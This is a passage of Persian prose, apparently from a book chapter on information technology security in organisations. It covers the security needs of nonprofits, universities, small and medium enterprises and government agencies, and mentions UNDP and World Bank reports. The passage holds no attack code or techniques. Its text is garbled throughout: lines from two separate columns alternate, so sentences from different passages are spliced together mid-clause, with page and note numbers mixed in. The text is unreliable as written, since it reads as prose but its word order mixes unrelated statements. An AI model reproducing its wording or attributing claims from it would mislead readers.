‫ﻣﺸﺘﺮﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻫﺪﺍﻛﻨﻨـﺪﮔﺎﻥ ﻛﻤﻜﻬـﺎﻱ ﻣـﺎﻟﻲ‪،‬‬ ‫ﭘﺎﻳﺪﺍﺭﻱ‪ ،‬ﻭ ﻛﻴﻔﻴﺖ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻧﺎﻇﺮﻳﻦ‪ ،‬ﻭ ﻣﺆﺳﺴﺎﺕ ﻫﻤﻜﺎﺭ ﺧﻮﺩ ﻳﻚ ﻭﺟﻬﺔ ﻣﺜﺒﺖ ﺍﺯ ﻭﺿـﻌﻴﺖ‬ ‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺑﻮﺳﻴﻠﺔ ﻗـﻮﺍﻧﻴﻦ ﻣﺤﻠـﻲ‪ ،‬ﻧﺎﺣﻴـﻪﺍﻱ‪ ،‬ﻳـﺎ ﻣﻠـﻲ‬
‫ﻭ ﻓﻌﺎﻟﻴﺖ ﻣﺆﺳﺴﻪ ﺑﻪ ﺗﺼﻮﻳﺮ ﺑﻜﺸﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣـﺸﻜﻼﺗﻲ‬ ‫ﻣﺤﺪﻭﺩ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻉ ﺗﺠﺎﺭﺗﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ ﻭ‬
‫ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ‪.‬‬ ‫ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﻓﻌﺎﻟﻴـﺖ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻨﺪ ﻣﺮﻛﺰ ﭘﺎﺳـﺨﮕﻮ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎ‬ ‫ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺭﻭﻧــﺪ ﺑﺮﻗــﺮﺍﺭﻱ ﺍﻣﻨﻴــﺖ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﻭ‬
‫ﻣﺸﺘﺮﻳﺎﻧﺶ ﺩﺭ ﻣﻘﺎﺑﻞ ﻓﺮﻳﺐ ﻭ ﺣﻤﻼﺕ ﺍﺳﺎﺳﻲ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﻋﻠﻴـﻪ‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‪ ،‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻧﻴـﺰ‬
‫ﺧﺪﻣﺎﺕ ﻭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣﺘﻤﺮﻛـﺰ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺟـﺮﻡ‬
‫ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﻮﺩﺟﻪﺍﻱ‪ ،‬ﺷﺒﻜﻪﻫﺎﻱ ﻫﺰﻳﻨـﻪﺑـﺮ‪ ،‬ﻭ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ‪ ،‬ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﻧﻴــﺰ ﺑــﺮﺍﻱ‬
‫ﺩﺍﻣﻨﺔ ﻭﺳﻴﻌﻲ ﺍﺯ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻓﻨﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﺑﻪ ﺩﻭ ﺣﻮﺯﺓ‬
‫ﺍﺳﺖ ﺑﺎ ﻳﻜﺴﺮﻱ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﺭﻭﺑـﺮﻭ ﺑﺎﺷـﻨﺪ؛ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﺍﺻﻠﻲ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﺩ‪ :‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﻼ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﺮﺍﻱ ﭘﺮ ﻛﺮﺩﻥ ﺍﻭﻗﺎﺕ ﻓﺮﺍﻏﺖ ﺧـﻮﺩ‬ ‫ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺜ ﹰ‬
‫ﺟﺎﺳﻮﺳﻬﺎ ﻳـﺎ ﻣﻬـﺎﺟﻤﻴﻦ ﺳـﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺑﺨﻮﺍﻫﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﺄﺳﻴﺴﺎﺕ ﺩﺍﻧﺸﮕﺎﻩ ﻧﻔﻮﺫ ﻛﻨﻨـﺪ! ﻋـﻼﻭﻩ ﺑـﺮ‬ ‫‪٥‬‬
‫ﻣﺸﺘﺮﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ‪.‬‬
‫ﺍﻳﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭﺍﺣـﺪﻱ ﻋﻤـﻞ‬
‫ﻛﻨﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻠﺰﻡ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﻣﻘـﺮﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ‬
‫ﻣﺤﻴﻂ ﺩﺍﻧـﺸﮕﺎﻩ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ‬
‫ﺗﻌﺮﻳﻒ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ‬ ‫‪۴‬‬
‫ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‪ ،‬ﻳﻚ ﻣﺎﻟﻚ ﺑﺘﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺟﻨﺒـﻪﻫـﺎﻱ‬
‫ﻣﻬﻤﻲ ﺍﺯ ﻗﺒﻴﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﭘﺰﺷـﻜﻲ ﻭ ﺍﺳـﻨﺎﺩ‬ ‫ﻳﻚ ﺗﺠﺎﺭﺕ ﺳﻨﺘﻲ ﻣﺜﻞ ﻣﺰﺭﻋﻪﺩﺍﺭﻱ ﻳﺎ ﺧﻮﺍﺭﺑﺎﺭ ﻓﺮﻭﺷﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣـﻲ‪-‬‬
‫ﺩﻫﺪ؛ ﻳﻌﻨﻲ ﻣﺎﻟﻚ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪ ﺁﻥ ﺗﺠـﺎﺭﺕ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺗﺠﺎﺭﺗﻬـﺎﻱ‬
‫ﺁﻣﻮﺯﺷﻲ ﺍﺳﺖ‪ .‬ﻣﻬﺎﺟﻤﻴﻦ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺭﺍ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻨﺪ ﺻﺪ ﻧﻔﺮ ﺗﻨﻬﺎ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ‬
‫ﺑﺪﺯﺩﻧﺪ‪ ،‬ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺑـﻴﻦ ﺑﺒﺮﻧـﺪ؛ ﻭ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ ﺍﻋﺘﺒـﺎﺭ‬ ‫ﻳﺎ ﻣﺤﺼﻮﻻﺕ ﻓﻨﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‪ ،‬ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑـﺎ‬
‫ﺩﺍﻧﺸﮕﺎﻩ ﺁﺳﻴﺐ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺗﻜﻴﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ‬
‫ﻭ ﻣﺘﻮﺳﻂ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﮔﺮﻭﻫﻬﺎﻱ ﺳـﺮﻣﺎﻳﻪ‪-‬‬
‫ﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺁﻧﻬﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷـﻮﺩ‪ ،‬ﺑـﺴﺮﻋﺖ ﺑـﺰﺭﮒ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﻳـﺎ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ‬ ‫ﺗﻮﺳﻂ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﺧﺮﻳﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ‬
‫ﻭ ﻣﺘﻮﺳﻂ ﺑﺴﻴﺎﺭ ﻣﻮﻓﻖ‪ ،‬ﺍﻭﺭﺍﻕ ﺳﻬﺎﻡ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨـﺪ ﻭ ﺧﻮﺩﺷـﺎﻥ ﺑـﻪ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﻋﻤﻮﻣﻲ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳـﺎﺱ ﻛـﺎﺭﺁﻳﻲ‪ ،‬ﺳـﻬﻮﻟﺖ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﻗﺎﺑﻠﻴـﺖ‬ ‫ﺩﺭ ﺣﺎﻟــﺖ ﻛﻠــﻲ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺩﺭ ﺷــﺮﻛﺘﻬﺎﻱ ﺑــﺰﺭﮒ ﻳــﺎ‬ ‫‪۵‬‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬ ‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ ﻣـﻲﻛﻨﻨـﺪ ‪-‬‬
‫ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻮﺁﻭﺭﻱ ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺯﺩﻳـﺪﻩ‬
‫ﮔﻴــﺮﺩ‪ .‬ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﺑﻄــﻮﺭ ﻛﻠــﻲ ﺩﺭ ﺑﺎﻓﺘﻬــﺎﻱ ﺩﻭﻟﺘــﻲ ﻣــﺴﺌﻠﻪ‬ ‫ﺷﻮﺩ ‪ -‬ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﻣﺤﺴﻮﺏ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ‬
‫ﺳــﻮﺩﺁﻭﺭﻱ ﻣﻄــﺮﺡ ﻧﻴــﺴﺖ‪ ،‬ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﻣــﺸﺎﺑﻪ ﻣﺆﺳــﺴﺎﺕ‬ ‫ﺗﺠﺎﺭﺕ ﻣﺸﻐﻮﻟﻨﺪ‪ ،‬ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱﺗﺮﻱ ﺍﺯ ﺟﺎﺳﻮﺳـﻲ ﺍﺳـﺖ‪،‬‬
‫ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﻭﻱ ﺑﻮﺩﺟﻪ ﻛﻨﺘﺮﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬ ‫ﻫﺮﭼﻨﺪ ﺁﺛﺎﺭ ﻫﺮ ﺩﻭ ﻣﺸﺎﺑﻪ ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﺧﺎﺹ ﻫﺮ ﺷﺮﻛﺖ ﺑﺎﻳـﺪ ﺳـﻮﺍﺑﻖ‬
‫ﺣــﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ‪ ،‬ﻭ ﺍﻃﻼﻋــﺎﺕ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻛــﺎﺭﺕ‬
‫ﺗﻮﺍﻧــﺎﻳﻲ ﺳــﺎﺯﻣﺎﻥ ﺩﺭ ﺗﻬﻴــﺔ ﺟﺪﻳــﺪﺗﺮﻳﻦ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺘﻴﺎﺑﻲ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ‪.‬‬
‫‪١٢٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺪﻭﻥ ﺑﺮﻧﺎﻣﺔ ﻛﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ‪ .‬ﻫﻤﺰﻣـﺎﻥ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺮ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻫﺮ ﻗﺴﻤﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻧﻴﺰ ﺗﻤﺮﻛﺰ ﻛﻨﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫﺎﻳـﺸﺎﻥ‬
‫ﺍﻣﻨﻴﺖ ﺗﻮﺳﻌﻪ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ‪ ،‬ﺍﻫﺪﺍﻑ‪ ،‬ﻭ ﻣﻘﺎﺻﺪ ﻋﻤﻠﻴـﺎﺗﻲ‬ ‫ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻓـﺮﺍﺩ ﺍﺳـﺖ؛ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ‬
‫ﻫﻤﺎﻥ ﻗﺴﻤﺖ ﻧﺎﺷﻲ ﺷﺪﻩ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻫﻤـﺎﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ‬ ‫ﻗﺒﻴﻞ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻭ ﺳﻮﺍﺑﻖ ﭘﺰﺷﻜﻲ‪ ،‬ﺟﻨﺎﻳﻲ‪ ،‬ﻭ ﻣﺎﻟﻴﺎﺗﻲ‪.‬‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﭼﻨـﺪﺍﻥ‬ ‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ ﻧﻴـﺰ‬
‫ﺑﻪ ﻛﺎﺭ ﻧﻴﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ‬ ‫ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺍﺳـﺖ ﻭ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻨـﺴﻮﺥ‪،‬‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻳﺎ ﻛﻤﺘـﺮ ﺍﺯ ﺣـﺪ‬ ‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻧﺎﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻱ ﻛﻪ ﻓﺎﻗﺪ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻭﺟـﻮﺩ ﻧﻈـﺎﺭﺕ ﺍﺯ ﻃـﺮﻑ‬ ‫ﺷﺎﻳﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺭﻧﺞ‬
‫ﻣﺪﻳﺮﻳﺖ ﺳﻄﻮﺡ ﺑﺎﻻ ﺗﻀﻤﻴﻦ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛـﻪ ﺗﺠـﺎﺭﺏ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﻣﻲﺑﺮﺩ‪ .‬ﻫﻤﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ‪،‬‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﻋﻤﻠﻜـﺮﺩ‬ ‫ﺩﻭﻟﺖ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﻪ ﺗﺼﻮﻳﺮ ﻋﻤـﻮﻣﻲ ﺍﻳﺠﺎﺩﺷـﺪﻩ ﺍﺯ ﺧـﻮﺩ ﭘـﺲ ﺍﺯ‬
‫ﺑﻬﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻨﻲ ﻛـﻪ ﺟﻬـﺖ‬ ‫ﺧﺒﺮﻱ ﻭ ﺭﺳﺎﻧﻪﺍﻱ ﺷﺪﻥ ﻫﺮ ﻧﻔﻮﺫ ﻳﺎ ﺭﺧﺪﺍﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴﺖ‬
‫ﻲ ﻛــﺎﺭﺁ ﺑــﺮﺍﻱ ﺳــﺎﺯﻣﺎﻥ ﻻﺯﻡ‬‫ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴﺘ ـ ﹺ‬ ‫ﺩﻫﺪ‪.‬‬
‫ﻣﻲﺑﺎﺷﻨﺪ ﻳﻚ ﺑﺨـﺶ ﺿـﺮﻭﺭﻱ ﻭ ﺍﺳﺎﺳـﻲ ﺍﻫـﺪﺍﻑ ﺗﺠـﺎﺭﻱ ﺭﺍ‬
‫ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺩﺭ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺑﻬﺎ ﺩﺍﺩ‪.‬‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ؛‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻨﺎﺑﻊ ﻛﻤﺘﺮﻱ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‪،‬‬ ‫ﻣﻮﺗﻮﺭﻫﺎﻱ ﺭﺷﺪ ﻭ ﺗﺮﻗﻲ‬
‫ﺳﺎﺧﺘﺎﺭ ﻣﺴﻄﺢﺗﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‪ ،‬ﻭ ﺍﻋﺘﻤﺎﺩ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﭘﺎﻳﮕﺎﻩ‬
‫‪ ٦UNDP‬ﺩﺭ ﮔﺰﺍﺭﺵ ﺍﺧﻴـﺮ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻭﺿـﻌﻴﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺍﺭﻧــﺪ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﻃـﺮﺡ ﻛﻠـﻲ ﺑﻌـﻀﻲ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑـﺰﺭﮒ‪ ،‬ﺷـﻔﺎﻓﺘﺮ‬
‫ﭼﺎﻟﺸﻬﺎﻳﻲ ﻛﻪ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻋﺼﺮ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ‬
‫ﺑﺎﺷــﻨﺪ ﻭ ﻟــﺬﺍ ﺩﺭ ﭼﻨــﻴﻦ ﺳــﺎﺧﺘﺎﺭﻱ ﻛــﻪ ﺩﺭ ﺁﻥ ﺍﻳــﻦ ﻣﻘــﺪﺍﺭ ﺍﺯ‬
‫ﻫﺴﺘﻨﺪ ﭘﺮﺩﺍﺧﺖ‪ ٧.‬ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭼﻨﺪ ﺳﺮﻱ ﮔﺰﺍﺭﺵ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺷــﺮﻛﺖ ﺑــﺮﺍﻱ ﻫﻤــﺔ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺭ ﺩﺳــﺘﺮﺱ ﺍﺳــﺖ‬
‫ﺗﻮﺳﻌﻪ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ ٨.‬ﺍﮔﺮﭼـﻪ‬
‫ﻲ ﺫﺍﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ‬ ‫ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ‬
